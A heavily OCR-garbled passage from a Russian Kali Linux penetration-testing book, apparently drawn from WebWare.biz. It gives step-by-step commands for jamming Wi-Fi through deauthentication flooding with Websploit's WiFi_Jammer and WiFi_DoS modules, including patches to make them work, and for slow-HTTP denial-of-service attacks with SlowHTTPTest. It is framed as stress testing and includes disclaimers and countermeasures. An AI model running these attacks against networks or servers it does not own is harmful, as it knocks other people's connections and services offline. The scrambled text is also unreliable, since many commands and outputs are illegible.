Рііе П /и5г/5Ітаге/\л/еЬ5рІоі1:/тосІиІе5/ѵѵіРі_с)о5.ру", Ііпе 76, іп \л/іРі_сІ05 

171 

05.сЬсііг("Ретр") 

181 

ОБЕггог: [Еггпо 2] N 0 зисіі Рііе ог ёігесРогу: 'Ретр' 


А сейчас ещё и новая ошибка — в точности как у ѴѴіРМаттег. Т.е. у него проблем 
больше и, следовательно, больше костылей. Приступим чинить \Л/іРі_0о5. 


1 


тксііг /гооР/Ретр && РоисН /гооТ/Тет р/ЫаскІізІ; 


Этот каталог не удаляйте, или создавайте перед каждым запуском \Л/іРі_0о5. 


Сам \Л/еЬ5рІоіР теперь нужно запускать так: 


1 


ссі ~ && ѵѵеЬзрІоіР 


Прежде чем приступить, сделаем резервную копию файла, который мы сейчас будем 
редактировать: 


1 


саТ /изг/зЬаге/ѵѵеЬзрІоіР/тосіііІез/ѵѵіРі-Сіоз.ру > 
/изг/зНаге/ѵѵеЬзрІоіР/тосІиІез/ѵѵіРі-Сіоз.ру.Ьак 


Теперь открываем файл /изг/зЬаге/ѵѵеЬзрІоіР/тосІиІез/ѵѵіРі-СІоз.ру 


1 


ѵіт /изг/зІіаге/ѵѵеЬзрІоіР/тосІиІез/ѵѵіРі-СІОБ.ру 


Находим там строчки: 


1| 

еІіР сот[0:7] =='5еР топ': 

2 1 

орРіоп$[3] = сот[8:12] 


И заменяем их на: 


1| 

еІіР сот[0:7] =='5еР топ': 

2 1 

орРіоп$[3] = сот[8:] 


И ещё ищем строки: 


1| 

еІіР сот[0:3] =='гип': 

2 1 

стсІ_0 = "аігтоп-п§ 5Рор " + орРіопз[3] 


И меняем их на: 


1| 

еІіР сот[0:3] =='гип': 

2 1 

стсІ_0 = "аігтоп-п§ зРор " + орРіопз[0] 


После этого всё должно работать. 
По материалам сайта ѴѴеЬѴѴаге.Ьіі 
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Глава 27. Стресс-тест беспроводной сети с ѴѴіГМаттег: как 
глушить \Л/і-Рі 

Если у вое какие-либо проблемы с беспроводными устройствами, то следует 
ознакомиться с Главой 19. Лучшие совместимые с Каіі ііпих 1/58 \А/І-Гі адаптеры 


Возможно ли глушить ХЛ/І-РІ 

Вы (или ваша организация) ответственно подошли к настройке беспроводных точек 
доступа (\Л/і-Рі): воспользовались подсказками по настройке роутера, в первую очередь, 
отключили \Л/Р5 и придумали очень сложный пароль. Значит ли это, что теперь можно 
расслабиться? Нет, у злоумышленников, как минимум, ещё пара трюков в рукаве — 
0о5 и глушение ѴѴі-Рі. Даже если они не смогут проникнуть в вашу сеть, они могут 
воспрепятствовать её нормальной работе. 

Эта инструкция описывает глушение \Л/і-Рі, предназначенный для стресс-теста вашей 
беспроводной сети, чтобы вы могли оценить имеющиеся угрозы и предпринять 
превентивные меры безопасности. 


Как правильно запустить ѴѴіТМаттег 

После обновления Аігсгаск-п§ изменилось имя беспроводного интерфейса. К 
сожалению, \Л/Мт_1аттег перестал работать. Но это легко можно исправить коррекцией 
одной строки. Посмотрите подробности в Главе 26. Чиним \Л/Щ іаттег и ѴУіГі Ро5 в 
ѴѴеЬЗрІоіІ: . Если вы уже отредактировали исходный код \Л/Нт_1аттег, то можно 
продолжать. 


Посмотрим имя нашего интерфейса: 


1| аігтоп-п§ 




гооі@МіАІ: “ 

паян 

Файл Правка Вид Поиск 

Терминал 

Справка 


:~# аігтоп-пд 
РНУ ІпТег'Гасѳ 

Огіѵег 

СГіірзѳІ: 



рГіуѲ ѵЛапѲ 

іѴѵгЫіТі 

ІпТеІ СогрогаТіоп СепТгіпо АсІѵапсесІ-М 6235 

(геѵ 24) 


:~# | 






Следующую команду запускаем так: аігтоп-п§ зіагі имя_интерфейса. У меня так: 


1 


аігтоп-п§ зТагТ ѵѵІапО 


По материалам сайта ѴѴеЬѴѴаге.Ьіі 


172 

















Тестирование на проникновение с помощью Каіі Ыпих 2.0 


гооіфМіАІ: 

Файл Правка Вид Поиск Терминал Справка 


і оо і р'іМіЛ I аігтоп-пд 

РНУ Іпіѳгіасѳ Огіѵег СНірзѳі 

рЬуѲ ѵЛапѲ іѵЛѵ\/ііі Іпіѳі Согрогаііоп Сѳпігіпо АсІѵапсесІ-М 6235 (геѵ 24) 

го г :~# аігтоп-пд зіагі ѵЛапѲ 

РоипсІ 2 ргосеззез іііаі соиісі саизе ігоиЬІе. 

Іі аігосіитр-пд, аігеріау-пд ог аігіип-пд зіорз іл/огкіпд аііег 
а зіюгі регіосі оі іітѳ, уои тау іл/апі іо кіІІ (зоте оі) іііѳт! 

РЮ №пш 

3016 N911/1/0 гкМападѳ г 
3176 сШсііѳпі 

РНУ Іпіѳгіасѳ Огіѵѳг СНірзѳі 

рНуѲ ѵЛапѲ іѵ/ііл/ііі Іпіѳі Согрогаііоп Сѳпігіпо АсІѵапсѳсІ-Н 6235 (геѵ 24) 

(тас8Ѳ211 топііог тосіе ѵіі епаЬіесІ іо г [рНуѲ] ѵЛапѲ оп [ рііуѲ] ѵЛапѲтоп) 
(тас80211 зіаііоп тосіе ѵіі сІізаЫесІ іог [рНуѲ]ѵЛапѲ) 


:~# | 


Обратите внимание, у меня появилось предупреждение (у вас его может и не быть): 


1| 

РоипсІ 2 ргосеззез іііаі соиісі саизе ігоиЫе. 

2 1 

Іі аігосІитр-п§, аігерІау-п§ ог аігіип-п§ зіорз \л/огкіп§ аііег 

3| 

а зіюгі регіосі оі ііте, уои тау ѵѵапі іо кіІІ (зоте оі) іНет! 

4| 

РЮ Мате 

5 1 

3036 МеіѵуогкМапа§ег 

6| 

3187 сІИсІіепі 


Программа предупреждает, что имеются конфликты с другими приложениями и что 
если аігосІіітр-п§, аігерІау-п§ или аігіип-п§ останавливают работу после короткого 
времени, то мне нужно остановить названные процессы. Это можно сделать так (у вас 
могут быть свои цифры — посмотрите на РЮ): 


1| 

кіІІ 3036 

2 1 

кіІІ 3187 


Продолжаем: 


1 


аігосіитр-п§ ѵѵІапОтоп 
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Файл Правка Вид Поиск 

гоо4@МіАІ: “ 

Терминал Справка 






ИНН 

і 

СН 3 ][ ЕІарзесІ: 

42 з 

][ 2015-07-02 

23:14 








В55Ю 

РШ 

Веасопз #081:3, 

#/з 

СН 

МВ 

ЕИС 

СІРНЕН 

X 

1— 

3 

<с 

ЕЗЗЮ 


2Ѳ:25:64:16:58:8С 

-50 

114 

13 

0 

11 

54е 

МРА2 

ССМР 

Р2К 

Міаі 


0С:54:А5:С0:24:О6 

-74 

119 

0 

0 

11 

54е 

ИРА 

ССМР 

Р5К 

ОАМІЕЕЕЕ2015 


00:26:24:89:20:30 

-75 

139 

3 

0 

5 

54е 

ИРА2 

ТКІР 

Р5К 

Иизага 


4С:72:В9:РЕ:В8:0С 

-83 

116 

1 

0 

4 

54е 

ИРА 

ССМР 

Р5К 

Кі«у 


Р8:1А:67:ЕС:Е9:1Р 

-84 

54 

8 

0 

7 

54е 

ИРА2 

ССМР 

Р5К 

орепЬох 


64:66:ВЗ:АЕ:8С:Е7 

-86 

6 

1 

0 

10 

54е 

ИРА2 

ССМР 

Р5К 

ІапрЬеп 1 


60:Е7 :01 :74:Р0:В4 

-87 

7 

0 

0 

10 

54е 

ИРА2 

ССМР 

РЗК 

ЮНИЗ 


Р8:1А:67:РѲ:73:7А 

-88 

34 

0 

0 

1 

54е 

ИРА2 

ССМР 

РЗК 

ЛапрТіеп 


С8:ЗА:35:Р9:1В:80 

-89 

4 

0 

0 

6 

54ѳ 

ИЕР 

ИЕР 


ОрепЬохІ 


00:21:27:Е0:С9:СЕ 

-88 

22 

2 

0 

6 

54 

ИРА2 

ССМР 

Р5К 

РС ВАУЕВИ 


В55Ю 

5ТАТІ0М 

РѴі/В 

ВаТе 

Еозі: Ргатез 

РгоЬе 


20:25:64:16:58:80 

20:02:АР:32:О2:61 

-40 

Оѳ 

- Ѳе 

29 

6 




20:25:64:16:58:80 

60 :РЕ:1Е:33:0Р:02 

-50 

© 

- 1 


19 

11 




00:26:24:89:20:30 

84 :55: А5:0Е:1Е:86 

-1 

36е 

- 0 


0 

1 




00:26:24:89:20:30 

78 :40:Е4:88:76:25 

-1 

1ѳ 

- 0 


0 

1 




00:26:24:89:20:30 

А4:9А:58:23:АС:93 

-81 

36е 

-11 


0 

4 





Я буду тренироваться на своей собственной ТД — она в самом вверху. 

Запускаем \Л/еЬ5рІоіІ 


1| 

ѵѵеЬзрІоіТ 

Задействуем плагин \л/і^ : і^атте^: 

1| 

ѵѵ$Т > изе ѵѵіТі/ѵѵіТуаттег 


гоо4@МіАІ: ~ 


ма О 


Файл Правка Вид Поиск Терминал Справка 


меЬзрІоіТ 

НАРШІМС: N 0 гоиТе ТоипсІ Тог ІРѵб сІезТіпаТіоп :: (по сІеТаиТТ гоиТе?) 


/\ \ _/\ \ 

\ \ \/\ \ \ \ _ _ _ _ 

\ \ \ \ \ \ \ \ _'\ / 1 , _ \/\ _'\\ \ \ / _ 

\ \ \_/ \_\ \/\ _/\ \ \ІЛ \А_, '\ \ \іл \\_\ \_/\ \і_\ \ \ \ \ \_ 

\ '\_X_/\ \_\\ \_,_/\/\_Л \ ,_//\ _\ \_/\ \_\ \_\ 

'\/ // / \/ 


/\ \ 

\ \ \ 

" % \ \ " 


/\_ \ 
\//\ \ 
'\\ \ \ 


_/\ \_ 
Л_\ \ ,_\ 
\/\ \ \ \/ 


/ \/ / \/ 


/ \ \ \/ \/ 
\ \_\ 

\/ / 


А/ / \/ А/ / 


--=[ ѴУеЬЗрІоіІ: РгатеИогк 
■ -==[Ѵѳгзіоп : ВЕТА 

■ -==[СосІепате : 

-==[Аѵаі1аЫе Мосіиіез : 19 
- -=[ІІрсІаТе РаТѳ : [г... .5 . ] 


; > изе \л/іТі/иіТі іагшпег 

: : ИіТ1_.Затгоег > | 


По материалам сайта ѴѴеЬѴѴаге.Ьіі 


174 






















Тестирование на проникновение с помощью Каіі Ыпих 2.0 


Вам обязательно нужно «отремонтировать» модуль ѵѵН^'аттег, поскольку после 
обновления сторонних программ, он стал неработоспособным. Подробности, а также 
как вернуть его в строй написано в этой инструкции . 


Посмотрим на его опции : 


1 


ѵѵзТѴѴіРНаттег > зИоѵѵ орііопз 


Нам нужно задать еззісі, ЬззісІ, сбаппеі и топ. Эти данные можно взять из вывода 
аігосІитр-п§. 


1| 

ѵѵзТѴѴіРНаттег > зет еззісі МіаІ 

21 

ѵѵзСѴѴіРМаттег > $еІ ЬззісІ 20:25:64:16:58:8С 

3| 

ѵѵзТѴѴіРНаттег > зеТ сНаппеІ 11 

Также обязательно: 

1| 

\л/5Іі\Л/іЯ_1аттег > 5е1 топ ѵѵІапОтоп 


Обратите внимание, что здесь нет вариантов, устанавливать значение нужно именно в 

ѵѵІапОтоп. 


Запускаем командой гип: 


1 


ѵѵбТѴѴТі іаттег>гип 


Контролировать процесс можно двумя способами. Первый — просто убедиться, что 
ваши устройства больше не подключены к беспроводной сети \Л/і-Рі. Второй — с 
помощью команды аігос!итр-п§ ѵѵІапОтоп. Обратите на такое поле её вывода как 
Р\Л/К. Его значение при нормальной работе находилось в районе 40. 


После начала атаки значение Р\Л/К составляет 0 и до самого конца атаки не 
поднимается. Сеть \Л/і-Рі в это время недоступна. 

гооІ@МІАІ: ~ тот 


Файл Правка Вид Поиск Терминал Справка 


] СИ 11 ][ ЕІарзѳсІ: 

1 тіп ][ 2015-07-02 

23:24 

][ іл/РА ИапсІзЬаке: 20:25:64: 

16:58 

О 

00 

В35Ю 

РѴі/В ВХ0 Вѳасопз 

#0аТа 

, #/5 

СИ 

МВ 

ЕМС СІРНЕВ 

АІЯН 

Е53Ю 

20:25:64:16:58:8С 

0 100 432 

209 

0 

11 

54е 

№А2 ССМР 

Р5К 

МіаІ 

ОС :54: А5 :С0:24 Ш6 

-72 100 596 

181 

0 

11 

54е 

ѴѴРА ССМР 

Р5К 

ОАІЧІЕІ-І.Е2015 

64:66:ВЗ:АЕ:8С:Е7 

-87 11 67 

0 

0 

10 

54е. 

ѴІРІ^2 ССМР 

Р5К 

ЛапрЬеп 1 

В55Ю 

ЗТАТ^ 

РШ 

Ваіе 

ЬозТ 

Ргатез РгоЬѳ 


20:25:64:16:58:80 

60 :РЕ:1Е:33:ѲР:Ѳ2 

-52 

1е - 

1ѳ 

17 

93 



20:25:64:16:58:80 

20:02: АР :32 Ш2 :61 

-55 

0ѳ- 

1ѳ 

0 

102 МіаІ 


(поТ аззосіаіесі) 

78:40:Е4:88:76:25 

-78 

ѳ - 

1 

3 

5 



(поі аззосіаіѳсі) 

СѲ:В0:01:Е0:А4:91 

-73 

ѳ - 

1 

0 

6 



(поТ аззосіаіесі) 

С4:56:РЕ:01:93:22 

-90 

ѳ - 

1 

0 

1 



0С :54 : А5 :С0:24 Ш6 

98 :В8:ЕЗ:7Р:ВА:ЕВ 

-1 

1ѳ- 

0 

0 

1 



0С :54: А5 :С0:24 Ш6 

ЕѲ :99 :71 :РА ШЗ :С9 

-80 

1ѳ- 

6 

0 

6 



0С:54:А5:С0:24:Р6 

4С:8Э:79:9С:06:54 

-82 

1е-24 

0 

6 




В данном примере мы глушили одну точку доступа, возможно глушить сразу все ТД, 
например, этой программой . 
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Суть атаки заключается в непрерывной отправке пакетов деаутентификации. 


23:24:57 

23:24:57 

23:24:58 

23:24:58 

23:24:58 
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Борьба с глушением \Л/і-Рі 

• Говорят, есть модели роутеров, которые не обращают внимание на 
широковещательные пакеты деаутентификации. Возможно, стоит поискать 
подобные модели. 

• Во время атаки нужно понимать, что атакующий должен находиться в 
непосредственной близости — не более чем в нескольких сотнях метров. 

• Можно настроить автоматический выбор канала в точке доступа. Это должно 
затруднить атаку, т. к. атакующий должен будет заботиться о переключении 
каналов. 

• Радикальное решение — купить проводной роутер. 

Используйте полученные данные только в благих целях. Это оградит вас и других 
людей от проблем. 


Глава 28. Стресс-тест беспроводной сети с \Л/іЯ_Оо5: как досить 
\Л/і-Рі 

Если у вое какие-либо проблемы с беспроводными устройствами, то следует 
ознакомиться с Главой 19. Лучшие совместимые с Каіі ііпих і 15В \А/і-Рі адаптеры 

У \Л/іЛ_Оо5 очень много общего с ѴѴИ'Маттег, о котором рассказано в предыдущей 
статье (« Стресс-тест беспроводной сети с \Л/Ич ]аттег: как глушить \А/і-Рі »). На самом 
деле, почти все команды одинаковые, кроме парочки новых. Поэтому, если вам не 
хватает каких-то подробностей или скриншотов, то посмотрите статью, на которую чуть 
выше дана ссылка. 

Данная информация предназначена для оценки потенциальных рисков Оо5-атаки 
ѴѴі-Рі и выработки мер противодействия на основе полученных результатов. 
Помните, вся ответственность за реализацию описанного здесь лежит на вас. Не 
нарушайте законы и права других лиц — именно так можно избежать большого 
количества проблем. 
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Как запустить \Л/іЛ_Оо5 

Глядя в исходный код \Л/іЯ_0о5, у меня появляются сомнения — работал ли он вообще 
когда-нибудь? Возможно, у кого-то и получалось запустить, но в определённых 
условиях. Там есть несколько неточностей, которые обязательно нужно исправить для 
нормальной работы. Поэтому начните со статьи « Чиним ѴѴіГі .Іаттег и ѴѴіТі Ро5 в 
ѴѴеЬЗрІоіІ: », а затем возвращайтесь сюда. 


Посмотрим имя беспроводного интерфейса и переведём беспроводную карту в режим 
монитора, чтобы собрать необходимые для ОоЗ-атаки данные. 


1| 

аігтоп-п§ 

21 

аігтоп-п§ зТагТ ѵѵІапО 


Смотрим список доступных сетей и необходимые нам данные: 


1 


аігосіитр-пё ѵѵІапОтоп 


\Л/еЬ5рІоі1: теперь нужно запускать так: 


1 


ссі ~ && ѵѵеЬзрІоіІ: 


Включаем использование модуля \л/іЯ_сІ05: 


1 


изе \л/іТі/ѵѵіТі_сІ05 


Задаём необходимые данные: 


1| 

ѵѵзбѴѴіГі-Роз > 5е1 еззісі МіаІ 

21 

\л/5Г:\Л/іГі_Р05 > зе! ЬззісІ 20:25:64:16:58:8С 

3| 

\л/5Г:ѴѴіГі_0о5 > зеі: сНаппеІ 11 


А здесь внимательнее, прочитайте рекомендацию ниже: 


1| 

\л/з1 : :\А/іЛ_Оо 5 > зеі іпіегі'асе ѵѵІапО 

2| 

ѵѵз^ѴѴіЛ^аттег > зеі топ ѵѵІапОтоп 


Здесь могут быть варианты, іпіег^асе — ѵѵІапО или что-то другое, что у вас отображается 
по команде аігтоп-п§. Значение топ всегда ѵѵІапОтоп — здесь без вариантов. 


Т.е., например, у меня рабочая конфигурация выглядит так: 
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гооі@МіАІ: 


- □ 


Файл Правка Вид Поиск Терминал Справка 


гооТ(аНіАІ сб ~ && ѵѵеЬзрТоіі 

МАВИШО: N 0 гоиіе ТоипсІ Тог ІРѵб сіезііпаііоп 


(по сіеТаиТі гоиТе?) 


) 


( 


( ( 

)\))( ' ( ( /( 

((_) ()\ ) ))\ )\ 0 ) 

_(О )\_) О /((_)((_)\ )\ /(/( 

\ \((_)/ /(_)) I I(_)((_)((_)_\ I 

\ \/\/ / / - ) I \(_-<| \)I 

!_■_//_/1 •_/ I 
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)\ 

(<_) 


\ А / \ 


.1 


) 

( ( /( 

( )\ )\ 0 ) 
)\( (_) (_))/ 

I ((_)(Л І_ 

|/ _ \| II _І 
|\_/|_| \_| 


. _ _** _ _ 
. _ _ ** _ _ 
_** _ _ 


- -=[МеЬ5р1оіі ЕгатеМогк 
-==[Ѵегзіоп : : .Р Г ЕТ- 
-==[СосІепате : 

-==[АѵаіТаЬТе Мосіиіез : 19 
--=[1)рсІаТе Раіе : [ 2.3.2014] 


ызТ > изе міТі/ѵ\/іТі_сІоз 
цзТ : МіТі_Роз > зеТ еззісі МіаТ 
Е55ІР => МіаТ 

мзТ : МіТі_Роз > зеТ ЬззісІ 20:25:64:16:58:80 
20:25:64:16:58:80 
> зеТ сЬаппеТ 1 


ВЗЗІР => 
ѵі/зТ : \л/іТі_Роз 

СНАММЕІ. => 1 

ѵѵзТ : МіТі_Роз > зеТ іпіегТасе ѵ/ІапѲ 
ІМТЕВЕАСЕ => ѵЛапѲ 
\л/зТ : МіТі_Роз > зеТ топ ѵЛапѲтоп 
МОМ => ѵЛапѲтоп 


мзТ:ИіТі Роз 

> зЬоад орііопз 



Орііопз 

ѴаТие 

ВО 

Резс гірііоп 

іпіегТасе 

ѵЛапѲ 

уез 

Ѵі/ігеіезз ІпіегТасе Мате 

ЬззісІ 

20:25:64:16:58:8С 


уез Тагдеі ВЗЗІР , 

еззісі 

МіаТ 

уез 

Тагдеі Е55ІР Мате 

топ 

ѵ/ІапѲтоп 


уез Мопііог МосІ(сІеТаиІі) 

сЬаппеТ 

1 

уѳз 

Тагдеі СЬаппеІ МитЬег 


>1 




И 


Запускаем: 


1 


ѵѵбТіѴѴіТі ]аттег>гип 


0о5 \А/і-Рі в действии, все беспроводные устройства потеряли связь с точкой доступа: 




Регіоіісаііу ге-геасііпд ЫаскІізіЛіІ'іііеІізі еѵегу 3 зесопсіз 

ВізсоппесТіпэ Ьеіыееп: РР:РР:РР:РР:ЕР:РР апсі; 20:25:64:16:58:8с оп сИаппеІ: 1 
Візсоппесііпд Ьеіиіееп: 00:04:Е2:Е2:07:04 апсі; 20:25;64:16;58:8С оп скаппеі: 1 
Візсоппесііпд Ьеішееп: 00:01:Е6:4С:Г7:6Й апсі; 20:25:64:16:58:80 оп скаппеі: 1 
Візсоппесііпд Ьеіыееп: 00:40;96:96:4Р;79 апсі; 20:25:64:16:58:8С оп сНаппеІ: 1 
Візсоппесііпд Ьеіиіееп: 00:90:Б1:Б1:РС:65 апсі; 20:25:64:16:58:80 оп скаппеі: 1 
Візсоппесііпд Ьеіиіееп: 00:06:25:Р5:27:8Р апсі: 20:25:64:16:58:80 оп сЬаппеІ: 1 
Візсоппесііпд Ьеіиіееп: 00:04:58:58:37:22 апВ; 20:25:64:16:58:80 оп сЬаппеІ: 1 
Еізсоппесііпд Ьеіиіееп: 00:0В:9В:64:46;92 апВ: 20:25:64:16:58:80 оп сЬаппеІ: 1 
Візсоппесііпд Ьеіиіееп: 00:11:24:СВ:В5;76 апсі; 20:25:64:16:58:80 оп сЬаппеІ: 1 
Візсоппесііпд Ьеіиіееп: 00:80:04:33:47:04 апсі: 20:25:64:16:58:80 оп сНаппеІ: 1 
Візсоппесііпд Ьеіиіееп: 00:03:2Р;С2:20;90 апВ: 20:25:64:16:58:80 оп сЬаппеІ: 1 
Раскеіз зепі: 2101 - бреесі: 16 раскеіз/зес| 
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пкікЗ 


Бака : СаркигесІ: 0 Зепк: 0 Резропзез: 0 Реіауесі: О 

Сііепкз: СгеаЪесІІ 938 ЙиЪНепЪ ісаЪесІ I 141 АззосіакесІ: 72 Сок КіскесІ: 69 

Шаба : СаркигесІ: 0 Зепк; 0 Резропзез: 0 Реіауесі: О 

Сііепкз: СгеакесІ: 969 АиккепкісакесІ: 183 АззосіакесІ: 72 Сок КіскесІ: 69 

Бака : СаркигесІ: 0 Зепк: 0 Резропзез: 0 Реіауесі: О 

Сііепкз: СгеакесІ: 989 АиккепкісакесІ: 185 АззосіакесІ: 73 Сок КіскесІ: 70 

рака : СаркигесІ: 0 Зепк: 0 Резропзез: 0 Реіауесі: О 

Сііепкз: СгеакесІ: 1010 АиккепкісакесІ: 185 АззосіакесІ: 73 Сок КіскесІ: 71 

Шаіа : СаріигесІ: 0 Зепі; 0 Резропзез: 0 Реіауесі: О 

Сііепкз: Сгеаіесі: 1030 АиккепкісакесІ: 186 АззосіакесІ: 73 Соі КіскесІ: 72 

Бака ; СаркигесІ: 0 Зепк: 0 Резропзез: 0 Реіауесі: О 

Сііепкз: СгеакесІ: 1051 АиккепкісакесІ: 188 АззосіакесІ: 73 Сок КіскесІ: 74 

Бака : СаркигесІ: 0 Зепк: 0 Резропзез; 0 Реіауесі: О 

Сііепкз: СгеакесІ: 1071 АиккепкісакесІ: 189 АззосіакесІ: 73 Сок КіскесІ: 74 

Бака ; СаркигесІ: 0 Зепк: 0 Резропзез: 0 Реіауесі: О 

Сііепкз: СгеакесІ: 1091 АиккепкісакесІ: 190 АззосіакесІ; 73 Сок КіскесІ: 77 

Бака : СаркигесІ: 0 Зепк: 0 Резропзез: 0 Реіауесі: О 

Сііепкз: СгеакесІ: 1112 АиккепкісакесІ: 191 АззосіакесІ: 73 Сок КіскесІ: 85 

Бака : СаркигесІ: 0 Зепк: 0 Резропзез: 0 Реіауесі: О 

Сііепкз: СгеакесІ: 1132 АиккепкісакесІ: 192 АззосіакесІ: 74 Сок КіскесІ: 96 

Бака : СаркигесІ: 0 Зепк: 0 Резропзез: 0 Реіауесі: О 

Сііепкз: СгеакесІ: 1152 АиккепкісакесІ: 193 АззосіакесІ: 74 Сок КіскесІ: 99 

Бака : СаркигесІ: 0 Зепк: 0 Резропзез: 0 Реіауесі: О 

Раскекз зепк: 31462 - ЗреесІ; 623 раскекз7зес| 


Часть 4. Стресс-тесты сети 

Глава 29. Стресс-тест сети (Оо5 веб-сайта) со 5Іо\л/НТТРТе$1 в Каіі 
Ыпих: 5Іо\л/ІогІ5, біоѵл/ Ьосіу и біоѵѵ геасі атаки в одном 
инструменте 

Стресс-тесты сети могут дать важные данные о проблемах, связанных с 
производительностью сервера, о неправильной (недостаточной) его настройке. Даже 
чтобы проверить, правильно ли настроен и работает тосІ_еѵа5Іѵе пригодятся утилиты 
для имитации Оо5 атак. 

Связанные статьи по защите веб-сервера: 

• Как усилить веб-сервер Арасбе с помощью тосі зесигііу и тоб еѵазіѵе на 

СепЮБ 

Связанные статьи по Оо5: 

• Стресс-тест сети с І_оѵѵ ОгЬИ Іоп Саппоп (1_ОІС) 

• Стресс-тест сети (Оо5 веб-сайта) с БІоѵѵНТТРТезІ: в Каіі Ыпих: зіоѵѵіогіз, 5Іо\л/ Ьосіу и 
5Іо\л/ геасі атаки в одном инструменте (вы её читаете) 

БІоѵѵНТТРТезІ: — это имеющий множество настроек инструмент, симулирующие 
некоторые атаки отказа в обслуживании (Оо5) уровня приложения. Он работает на 
большинстве платформ Ыпих, 05Х и Су§\л/іп (ІІпіх-подобное окружение и интерфейс 
командной строки для МісгозоД ѴѴіпсІоѵѵз). 

Эта программа реализует наиболее общие замедляющие работу сети Оо5 атаки уровня 
приложений, такие как 5іо\л/іогіз, атака $1о\л/ Ьосіу, атака Біоѵѵ КеасІ (на основе эксплойта 
постоянного таймера ТСР), она занимает весь доступный пул подключений, а также 
атака АрасЬе Кап§е Неасіег, которая становится причиной очень значительного 
использования памяти и центрального процессора на сервере. 

5іо\л/іогі5 и Біоѵѵ НТТР Р05Т Оо5 атаки полагаются на факт, что НТТР, намеренно, требует 
от запросов быть полученными сервером полностью до того, как они будут 
обработаны. Если запрос НТТР неполон или скорость его пересылки очень медленная. 
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сервер сохраняет своио ресурсы занятыми, ожидая оставшихся данных. Если сервер 
поддерживает слишком много занятых ресурсов, то это влечёт отказ в обслуживании. 
Этот инструмент отправляет частичные запросы НИР, пытаясь добиться отказа в 
обслуживании от целевого НТТР сервера. 

Атака 5Іоѵѵ КеасІ нацелена на те же ресурсы, что и зіоѵѵіогіз со зіоѵѵ бобу, но вместно 
продлевания запроса, она отправляет легитимные НТТР запросы, но ответы читает 
медленно. 


Установка БІоѵѵНТТРТезі: 

Установка для пользователей Каіі Ыпих 


Для пользователей Каіі Ыпих установка через арТ-^еТ .. (жизнь хороша!) 


1 


арТ-§е1; іпзіаіі зІоѵѵЫірІезІ: 


гооЦ§)МіАІ: ~ 

Файл Правка Вид Поиск Терминал Справка 


:~# арТ-деІ іпзТаІІ зІоѵі/ІтГТрТезІ: 

Чтение списков пакетов... Готово 
Построение дерева зависимостей 
Чтение информации о состоянии... Готово 
НОВЫЕ пакеты, которые будут установлены: 
зІомЫТрТезТ 

[обновлено 0, установлено 1 новых пакетов, для удаления отмечено 0 пакетов, и 27 
іпакетов не обновлено. 

[Необходимо скачать 29,6 кВ архивов. 

После данной операции, объём занятого дискового пространства возрастёт на 98,3 к 
В. 

Получено:1 ГіТИр://И1:1:р.ка1і.огд/ка1і/ каіі/таіп зТомГіТТрТезТ атсІ64 1.6-1ка1і1 [2 
9,6 кВ] 

[Получено 29,6 кВ за 4с (7 294 Б/с) 

іВыбор ранее не выбранного пакета зІомГіТТрТезІ: . 

(Чтение базы данных ... на данный момент установлено 355813 файлов и каталогов.) 
ІРаспаковывается пакет зІомМг'Ср'СезІ: (из файла .../зТ оѵѵ/ИІ: 1: рі ез1:_1 .6-1ка1і1_атсІ64.сІеЬ 
) ... 

Обрабатываются триггеры для тап-сІЬ ... 

Настраивается пакет зІомГіТТрТезІ: (1.6-1 каіі 1) ... 
п-іі :-# | 


Для других дистрибутивов Ыпих 


Инструмент распространяется как портативный пакет, т. е. просто загрузите последний 
тарбол из секции загрузки, извлеките, настройте, скомпилируйте и установите. 


Этот набор команд делает следующее: скачивает самую последнюю версию 
ЗІоѵѵНТТРТезІ:, распаковывает её и переходим в каталоге программой: 


1 


(1='сигІ -5 Ы:1:р5://сосІе.§оо§Іе.сот/р/5Іо\л/М:1:р1:е5І:/сІо\л/пІоасІ5/ІІ5І: | §гер -Е -о 
'//зІоѵѵЫірІезІ.ёоо^ІесосІе.сотДіІеБ/зІоѵѵІіирІез^^.Іаг.ёі" опсІіск="' | $есІ ѴѴѴ//' I 
зесі '$/" опсІіск="//' | ИеасІ -1'; сигі -5 $1 -о зІоѵѵЫірІезЫазІ.Іаг.ёі) && Іаг -хіѵ^ 
зІоѵѵІіирІеБЫазІ.Іаг.ді && ссі БІоѵѵЫірІеБІ:-* 


Т.е. теперь только остаётся выполнить конфигурацию, компиляцию и установку. 


По материалам сайта \Л/еЬ\Л/аге.Ьіг 


180 













Тестирование на проникновение с помощью КаМ Ыпих 2.0 


Для тех, кто предпочитает скачать архив вручную, переходите сюда . 


1| 

$ Таг -Х 2 ѴІ зІоѵѵЫіІірІіезТ-х.х.Таг.ёг 

2 1 

$ ссі зІоѵѵЬйрІезІ-х.х 

3| 

$ ,/сопб§иге -ргебх=РКЕРІХ 

4| 

$ таке 

5 1 

$ зиёо таке іпзіаіі 


Здесь РКЕРІХ должен быть заменён на абсолютный путь, где инструмент зІоѵѵНМрІезІ: 
должен быть установлен. 

У вас должна быть установлена ІіЬззІ-сІеѵ для успешной компиляции этого инструмента. 
Большинство систем должны иметь его. 

Мае ОБ X 


Используем НотеЬгеѵѵ: 


1 


Ьгеѵѵ ирсіаіе && Ьгеѵѵ іпзТаІІ зІоѵѵЫТрІезІ: 


Ыпих 


Попробуйте ваш любимый пакетный менеджер, некоторые из них знают о зІоѵѵЬТТрТезІ; 
(как Каіі Ыпих). 

Использование БІоѵѵНТТРТезІ: 

зІоѵѵНМрІез! это потрясающий инструмент, который позволяет делать многие вещи. 
Далее только несколько примеров использования. 

Пример использования в режиме 5Іо\л/ бобу а.к. а К-ІІ-ОеасІ-ѴеІ;, результаты только 
выводятся на экран: 


1| 

зіоѵѵіійріезі: -с 1000 -В -і 110 -г 200 -5 8192 -1 РАКЕѴЕКВ -и Ьйр://192.168.1.37/іпРо.рНр - 
х10 -р 3 

Тоже самое, но график сохраняется в файл: 

1| 

ІоѵѵЬйрІезІ: -с 1000 -В -§ -о ту_ЬосІу_5І:а1:5 -і 110 -г 200 -5 8192 -1 РАКЕѴЕКВ -и 
Ы:1:р://192.168.1.37/іпТо.рИр -х 10 -р 3 


Тезі гезиііз адаіпзі И«р://192.168.1 .37/іпТо.рНр 


ф 

с 

с 

о 

и 



■ СІозей 

■ Репйіпд 

■ Соппесіей 

■ Зегѵісе 
аѵаіІаЫе 


Зесопсіз 
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А это тесты памяти, которые я проводил с интервалами в несколько секунд на сервере, 
который подвергался атаке. Первый замер сделан до атаки, последующие — во время. 
Видно, что количество свободной памяти уменьшалось очень стремительно вплоть до 
того момента, пока сервер не лёг. 


С 


Ггоо1@'л'еЬ'л'аге-0еЬі ап :~# ’Ргее 





РоРаІ 

ивесі 

Ргее 
